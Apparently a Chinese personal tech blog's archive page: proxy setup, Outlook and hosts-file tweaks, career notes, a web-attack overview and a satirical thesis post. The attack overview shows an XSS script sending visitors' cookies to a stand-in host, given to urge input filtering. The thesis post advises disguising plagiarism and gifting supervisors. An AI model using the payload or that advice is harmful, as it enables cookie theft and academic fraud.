-
个人简介:
PHP开发者,高可用性、分布式集群实践者,伪Python、GAE开发者,伪Linux系统管理员,伪MySQL管理员
2009年8月至今服务于阿里巴巴云计算公司
2008年8月至2009年7月31日服务于博客大巴
-
归档
- 2012 年一月
- 2011 年十一月
- 2011 年九月
- 2011 年八月
- 2011 年七月
- 2011 年六月
- 2011 年五月
- 2011 年三月
- 2011 年二月
- 2011 年一月
- 2010 年十二月
- 2010 年十一月
- 2010 年十月
- 2010 年九月
- 2010 年八月
- 2010 年七月
- 2010 年六月
- 2010 年五月
- 2010 年四月
- 2010 年三月
- 2010 年二月
- 2010 年一月
- 2009 年十二月
- 2009 年十一月
- 2009 年十月
- 2009 年九月
- 2009 年八月
- 2009 年七月
- 2009 年六月
- 2009 年五月
- 2009 年四月
- 2009 年三月
- 2009 年二月
- 2009 年一月
- 2008 年十二月
- 2008 年十一月
- 2008 年十月
- 2008 年九月
- 2008 年八月
- 2008 年七月
- 2008 年六月
- 2008 年五月
- 2008 年四月
- 2008 年三月
- 2008 年二月
- 2008 年一月
- 2007 年十二月
- 2007 年十一月
- 2007 年四月
-
杂项
标签归档:常识
使用Firefox+foxyProxy+SSH翻山越岭
每次我说能够自动进行代理访问一些被和谐的网站时候,别人都要问我一遍怎么弄,如果是身边,倒是好说,我随便帮你弄下就好了,如果是通过IM工具来问的朋友,我就不知道该怎么回答了,如果对方仅仅是为了翻山,而且计算机基础一般的话,那就更说不清了,我觉得我有必要搞个图文并茂的文章,下次,别人问我的时候,我就可以直接把这个链接给他了。 PS:转载请注明出处,请各位手续留情,谢谢。 完成配置的前提是你必须要有一个可以使用的SSH帐号,并且服务器是在墙外,比如美国、香港等地,如果你没有,你可以在此留言或者联系我,我不能保证你能获取到一个免费的SSH帐号,可能我可以告诉你一些获取途径和方法。 1、下载firefox, 并且双击安装好,如果你已经有firefox,省略此步,下载地址:http://www.mozilla.com/ 2、安装FoxyProxy扩展:如果你已经有这个扩展,省略此步,安装地址:https://addons.mozilla.org/zh-CN/firefox/addon/2464 ,点击打开的页面上的“安装到Firefox”,然后会问你是否允许,点击允许,如果没安装,再点一下“安装到firefox”按钮,重启firefox 3、下载MyEnTunnel, 你也可以使用Putty 或者 plink这样的工具,但是会多出来一个黑乎乎的窗口,很烦,这个小软件可以避免这样的问题,下载地址: http://dl.dropbox.com/u/140847/setup_myentunnel.exe ,下载完成后双击安装文件,完成安装。 4、启动MyEnTunnel, 在setting选项卡中,大致的设置如下图: SSH server中填入你的SSH服务器IP地址,SSH port是SSH帐号端口,一般默认即可,后面是你的用户名和密码,其他的设置正常情况下照抄即可 5、设置foxyproxy,点击firefox右下角黄色的狐狸图标,按照下面的图示进行设置: 新建代理服务器: 设置代理服务器名称,推荐勾选上perform remote dns的选项,防止DNS劫持: 设置代理服务器地址及端口,如果你的MyEnTunnel按照我上面的图配置,并且连接成功,那么此配置依然可以照抄。 设置代理模板,在访问Web的时候,foxyproxy会自动根据你访问的地址,来跟这个模板进行匹配,如果成功,则使用代理,如果不成功则不使用,这样做的好处是,当你的时间大部分是在浏览没有被和谐的网站时,就不用走代理服务器,这样既能给你带来速度也给代理服务器节省流量,一举多得啊。 上图中我用了一个twitter的例子,按照上面的设置,你在访问twitter时,会自动使用代理,访问其他网站则不会使用代理,非常方便。 这仅仅是个新手的教程,老鸟请略过,前面说了,只是为了以后给新手普及翻山越岭本领的时候,少说几句。
程序语言评估标准
1、可读性。判断一个语言的优劣的一个最重要的标准是用它写的程序要好读,好懂。 一种语言的整体简单性极大的影响着他的可读性。一种具有大量基本结构的语言较只有少量基本结构的语言要难学得多,当然,过少也会非常难学,汇编就是如此。 2、正交性。正交性是指使用该语言中一组相对少量的基本结构,经过相对少的组合步骤,可以构成该语言的控制结构与数据接哦股。而且,它的基本结构的任何组合都是合法和有意义的。 3、控制语句。在20世纪50年代和60年代,一批程序设计语言由于缺乏控制语句,导致很差的可读性。随后的语言都兴起了结构化程序设计的革命。尤其是人们普遍意识到滥用goto会降低程序设计的可读性。 4、数据类型和数据结构。在程序设计语言中给出定义数据类型和数据结构的合理机制,是语言可读性的又一个重要辅助。 5、可写性。可写性是程序设计语言的在应用领域产生程序的难以程度的一种度量。大多数影响可读性的语言特征可以影响可写性。 6、支持抽象。抽象指的是以合法的省略许多细节的方式,来定义并且使用复杂结构或复杂运算的能力。 7、表达性。语言的表达性可以指语言中几种不同特征。一种是具有一些功能很强的运算符。一种是程序语言具有相对方便,非繁琐的方式来说明运算。 8、可靠性。如果一个程序在任何条件下的运行都能 达到他的说明标准。我们称这饿程序是可靠的。 9.代价。第一是训练程序员使用这种语言的代价。第二是使用这种语言来编写程序的代价。第三是编译程序的代价。第四是程序运行的代价。
OUTLOOK2007最小化到托盘显示
由于公司的提供邮箱实在是小,而且几乎可以说是没有Web界面,出于有条件的情况下,一定使用正版和与大家保持一致的原则,选择了outlook 2007 ,这家伙居然默认不支持最小化到任务栏~~~ OUTLOOK启动后最小化总是在任务栏上占一个位置,工作起来碍事, 最后修改注册表解决之。 1.打开注册表 : 开始菜单 -> 运行, 输入”regedit”并回车 2.打开HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Outlook\Preferences项目 3.建立一个DWord的值(双字节值),名称为”MinToTray”, 取值改成 1 4.关闭注册表编辑器, 如果Outlook 2007运行中,关闭. 5.启动Outlook2007, 此时系统托盘区已经有一个Outlook2007的小图标了, 当你把Outlook2007最小化的时候, 它就会自己缩到托盘区了. 最后不得不感叹一句,这年头,微软的东西也设计得不易用啊~~
迅雷去广告方法
迅雷应该算是当前中国装机量最大的下载软件,很多人没听过快车,很少人没听过迅雷,不过迅雷在一开始就过度的关注商业利润,使得现在广告满天飞,严重影响用户体验,致使很多人使用修改版(去广告版)迅雷,修改版迅雷之所以受欢迎,不仅仅因为广告,还因为CPU消耗更多,更关注用户的隐私,更方便。这个很类似当年的珊瑚虫QQ,我觉得迅雷有必要去学学QQ了,QQ自从2009版本发布以后,允许用户自定义界面模块,并且边界可隐藏,广告体验大大的优化了,我看过大部分人都不隐藏界面上的东西,有些是因为他们不知道,有些是因为习惯了这样的界面,但无论如何,更好的UI体验,更自由的定制,都堵住了像我这样挑剔的用户的嘴巴,或者用说就是不给钱却要求很多的高端用户,迅雷做的还远远不够,弹出的广告太恶心。 其实修改版迅雷除了精简了一些模块和调整了一些默认设置之外,还做了一件最重要的事情就是修改hosts文件,关于这个文件的作用可以参考百度百科中的解释,这文件的位置位于:C:\WINDOWS\system32\drivers\etc,当然假如你的系统不是在C盘,那就看着办吧,在上面的路径中找到hosts文件,然后右键打开方式里面选择记事本,在文件的最后添上如下字段: 0.0.0.0 pubstat.sandai.net 0.0.0.0 mcfg.sandai.net 0.0.0.0 biz5.sandai.net 0.0.0.0 float.sandai.net 0.0.0.0 cl.kankan.xunlei.com 0.0.0.0 mtips.xunlei.com 0.0.0.0 211.94.190.80 0.0.0.0 adsresult.joywell.com.cn 0.0.0.0 advstat.xunlei.com 0.0.0.0 wy.xunlei.com 0.0.0.0 kkpgv.xunlei.com 0.0.0.0 statis.kankan.xunlei.com 0.0.0.0 server1.adpolestar.net 0.0.0.0 mpv.sandai.net 目前可以达到去除所有广告的目的,不知道以后会不会改地址,暂且用之。另外,修改版迅雷可能会被插入一些用户行为统计的代码或程序,比如尼尔森,艾瑞所思之流就经常和流氓软件的作者合作干这种勾当,这也是我不使用修改版的一个重要原因之一。
连日来的一些感慨
1) 不要相信任何第三方,即使是你的兄弟开的公司,也不一定跟你说真话,因为很多话是不能跟你说的,第三方和你合作的唯一目的就是钱,当然公司间的合作本来就是利益合作,这本无可厚非,但是总有人利用信息不对称,对灌输给你的信息做对他更有益的改动,然后在合作后频频跳票,不兑现承诺,所以对付第三方的唯一办法就是,找一堆供应商,然后让他们把承诺统统变成白纸黑子,然后挨家比较,选中了之后,把这些白纸黑子变成合同条款,不然拒签。还好上海是一个还算守法律的城市,基本上写进合同的都能兑现,不能兑现都会给一个合理的赔偿或者置换。 2)网站运行速度慢,第一个要检查的是数据库,而不是程序逻辑 3)如果有服务出现了故障,大多是程序本身出了问题,前提是服务器和网络没有异常的情况下,所以无论你愿不愿意都最好能重现一下错误,这是解决问题的最好办法 4)服务器服务调整是个慢工细活,动之前大脑里应该清楚每个细节,如果不熟悉,最好用纸写下来,然后再仔细想想,然后再开始做,假如你和曹宇伟 一样牛逼或者比他更牛逼,能够把shell运用的出神入化,那另当别论 5)文档是最好的老师,网上的那些免费的收费的电子书,都是文档加上作者的理解写成的,假如英文尚可的话,还是直接阅读文档的比较好,我如果遇到一个新的东西,我一般会查一下中文的介绍,大致了解一番,然后去阅读手册,有时候想啊,手册这么好的东西,怎么就没人翻译一下呢,每每冲动去翻译几个手册,苦于乱七八糟的事情和心情太多,浪费了很多时间。 6)不要太相信国内所谓的牛逼的公司的牛逼的人的推介的书,基本上都是炒作,书本身并没有太大的价值,比如《Apache源码分析》和 《走出软件作坊》,作序者都很狡猾,基本上不会提及书的任何内容,当然也可能是作序者根本没看过自己作序的这本书,所以里面大多介绍作者是怎么样一个人,作者的团队、背景甚至认识过程等等,这点在阿里DBA简朝阳先生《mysql 性能调优与架构设计》中尤为突出,那么多所谓的牛人作序,没有一个提及书的内容,不过简朝阳先生的性能调优几个章节还是值得一读的,架构设计不过是一带而过,我觉得不应该放在书名中,名不副实。 7)***权威指南 都是骗初学者的,大段大段的抄手册里面的内容,初学者因为不熟悉所学技术的手册,可能会觉得这种书很详实,用到的都有,其实如果去翻下手册,就知道,还有比这个写的更好的,所以手册不仅是最好的老师,也是最权威的权威指南。 8)不要因为技术而技术,这点对技术人员非常重要,大多数技术人员都喜欢更新的东西,确实,新的东西比旧的东西在多数时候更强大,但你的需求真的需要那些新的功能么?如果花了很大的力气研究一门新的东西,然后只用到老的东西里面也有东西,那么就是浪费了,所以,能满足需求的就是最好的。 9)scalable 在国内都翻译成“可扩展”,比如《构建可扩展的Web站点》一书就是这么翻译的,事实上,应该翻译成“可伸缩”,大部分时候你的网站随着流量的不断增长,服务和设备保持着一种扩张的状态,当我们上了一个可以扩展的解决方案之后,它能不能收缩呢?万一某个时刻我们发现这些东西不是想象中那么好用或者有用,毕竟有些东西需要很大成本的,比如51.com前些日子就裁掉了整个宁波机房,我们是否可以退回去? 10)过程是需要的,谁也不能一蹴而就,一步登天,成功的人都是认真的活到他成功的那一天,急躁只会令自己丧失和浪费更多的时间
表单及URL攻击的几种方法
有时候程序员为了偷懒或者是在无意识的情况下缺少了对外部数据的过滤,Web安全习惯上将所有用户输入的数据假定为受污染的数据(即可能带有攻击性的数据),现在比较流行的XSS(跨站脚本攻击)就是利用对用户输入过滤不完全而进行的攻击,因为用户数据过滤不完全会导致很多很多问题,我这里只是简单的介绍几种比较常见的表单及URL攻击方式,希望读者能够最大限度的注意过滤用户输入。 1)表单数据泄漏攻击 这个一般刚入行的人可能会犯错,说得通俗一点,就是该用POST方式提交数据的时候,用了GET方式提交数据,比如,用户登录时候用了GET方法,导致用户名和密码都在URL上直接显示出来了,当然假如真的傻到这种程度,这种应用大多还是属于自己玩玩的东西,不是产品。还有一种是登录等操作,在提交数据的时候被窃听或者拦截了,这种没有很好的方式去解决,最多就是利用可以在浏览器上执行的脚本,比如JavaScript对密码和用户加密后提交到服务器,而且最好采用不可逆的公共算法,在浏览器端执行的脚本如果使用自己的算法,会增加被破解的几率,当然如果你的加密程度能超过或者接近现在流行的公共加密算法,那么也是可以的:) 2)语义URL攻击 这也是利用提交的形式及参数进行攻击的,假如使用GET方式找回密码,url为:http://example.org/private.php?user=abc&email=abc@11.org,那么产生的攻击也很简单,只要将user=abc改成任意其他的存在的用户密码就会发到后面的email中,轻松获取别人密码,POST方式大体也是通过窃听方式获得提交的数据 3)文件上传攻击 文件上传造成的危害在表单攻击中是最大的,假如成功入侵,最坏的情况甚至是可以干任何想干的事情,因此对此不可小觑。常见的有大文件攻击,假如你的服务端没有做限制的话,那么你的硬盘很快就会被塞满,或者是你在客户端中只是简单的限制了一下,那些对于心怀不轨者都是摆设,太容易绕开了。假如上传的是一个可执行的脚本,在某种情况下会激活这个脚本,那么后果就不堪设想,验证上传文件的后缀和限制上传文件的种类是能避免大多数低级别的攻击者,但根本还是让存放用户上传的文件的目录没有执行权限,脚本不能执行,那么它也仅仅是一般文本而已。 4)跨站脚本攻击 跨站脚本攻击是众所周知的攻击方式之一。所有平台上的Web应用都深受其扰,PHP应用也不例外。 所有有输入的应用都面临着风险。Webmail,论坛,留言本,甚至是Blog。事实上,大多数Web应用提供输入是出于更吸引人气的目的,但同时这也会把自己置于危险之中。如果输入没有正确地进行过滤和转义,跨站脚本漏洞就产生了。 比如在一个博客平台提供商,一个心怀不轨的用户在写博客时故意在内容中插入<script> document.location = ’http://abc.example.org/steal.php?cookies=’ + document.cookie</script>,结果所有浏览这篇文章的读者的Cookie信息都在不知情的情况下发给了第三方。 5)HTTP请求欺骗攻击 所谓上有政策下有对策,很多项目为了最大程度的得到高可信度的用户输入,甚至添加了判断referer的功能,可惜这个东西十分的不靠谱,随便一个CURL就可以欺骗过去。 毕竟所有的传输都只是个协议而已,而HTTP协议本身只是负责传输,并不负责诸如安全之类的其他问题,所以过程怎么伪造都是可以的,只要攻击者足够的熟悉HTTP协议,针对HTTP协议本身的攻击,似乎目前还没有看到,虽然欺骗、攻击随处可见,方式变化多样,只要做好了过滤,多想一点再多想一点,任何攻击得到的都是一个错误页面而已
开发环境的三大规则
1)使用源码控制 2) 使用单步创建 3)跟踪程序缺陷 每个人都有自己偏好的事情和做事方法,无论在开发那种大规模应用程序时,他们都会严格遵循这些作诗方法。具体的做事原则取决于所选择的特定的开发方法理论,但还是有一些普遍规则实际上是放之四海而皆准。对于大型Web应用程序的开发领域而言,以上三条在成功开发团队中屡见不鲜。可能是规则这个次太夸张了,称之为指导方针可能更适合一些。当然,不去应用这三条简单的规则也是可行的,仍然可以产出可用的产品。但这三条规则能够帮助你避开小规模应用程序迁移到大型程序时常常遇到的问题,并且帮助你更快的完成这个迁移过程。
PHP是可扩展的语言
PHP逐渐被大家认可为一种严肃的语言,但还是很多人声称它是不可扩展的。这显然不是事实–互联网上很多最大的… 继续阅读
怎样写毕业论文?
18岁以下,勿读分割线以下内容,本文有害你的身心健康…… ======================================= 我不认为我是一个标题党,虽然我下面的内容不配这个标题,读完这篇文章或许不能让你立刻写出一手漂亮的毕业论文,但画龙贵在点睛,或许给帮需要的后来人一个思路,我可以大胆的预言,这个思路在十年内都是有效的,除非哪天中国的教育体制从根本上改变了,而这种可能性几乎为零,因为老师们也是这样写论文的,改变规则就意味着他们不能再轻松的获得研究经费,用来买车,买房,甚至买厕纸…… 进入正题。在互联网如此发达的今天,很多同学的论文的第一手材料都来自于互联网,其次才是文献。小学的时候我听高年级的同学说:天下文章一大套,看你会套不会套!到了大学,这句话演变成了:天下文章一大抄,看你会抄不会抄!可见今日校园之风气。 其实说抄有点难听,写过论文的都知道,都有硬性要求引用参考文献的数量及种类数。比如我们要求至少引用10篇参考文献,其中英文文献不得少于5篇。而整个毕业论文要求的字数是1万2千字,要引用这么多文献,每个“引用”个一段两段的,字数就上万了,自己再添加个开头结尾的,论文就整完了。事实上老师们用了几年甚至几十年的招数,他就是不让你用,老师们都很狡猾的,他们回去晚上找一下你的参考文献,然后找到你“引用”的页数,所以你如果想大段的“引用”,最好能更改一下语句顺序,一般老师都会睁一只眼闭一只眼放你过了,如果你稍微高级一点,那就理解一下作者的意思吧,然后用自己的话写出来,高级一点的教授或者博士同志就是这么干的,这样就找不到罪证了。 这里要提醒一下的是千万不要照抄互联网上的内容,比如你看到某博客上某文写的非常的好,于是你“引用”了几百字,老师们都是很聪明的,他也会觉得这段写的非常好,这里我们假定这个老师是负责的,看过你的论文,假如你碰到一个整天说“忙死了”的老师,那是你的幸运,另当别论。如果老师觉得这段写的好,他会挑几个关键词google之,你的马脚很容易露馅了,结果有两种,一种是发现的比较早,勒令重写论文;一种是发现晚了,那么你等着二次答辩吧,这个玩意是很痛苦的。 假如你觉得肚子里实在没什么墨水或者自己在创业,实在没有时间写论文,找人代笔,那也行。中国五千年的灿烂文明,造就了中国复杂的人际营销市场。老师们都是很清高的,送钱是绝对不会要的,收下了,一来他会觉得自己良心不安的,毕竟都是读书人嘛,二来,老师们都是公务员待遇,平时买包厕纸都有的报销的,根本不稀罕你那几个铜板。其实书生的肚量都不是很大的,送个礼不需要很多钱,只要能讨欢心即可,比如你的教授自己很喜欢泡图书馆或者是领导,那么你送一支派克笔是不错的选择,这玩意,超市买一支,便宜点也才两三百块钱,一般老师分辨不出来两千块和两百块的派克笔,当然价格上万的金笔就不一样了。搞计算机的老师一般都喜欢折腾,送个能折腾的东西也是很不错的,比如高档点的蓝牙耳机,前提是你侦查到他有支持蓝牙设备,森海塞尔的有线耳机也是不错的,年级大一点的可以送盒茶叶等等,总之能让你的老师开心即可。 本文非常邪恶,完全属于河蟹范畴,看官切勿模仿之,如确需模仿,切勿照搬,因地制宜修改一下亦可,本文遵循BSD协议,因此完全没有强制约束要把你的修改版也放出来共享,看官可独享也!
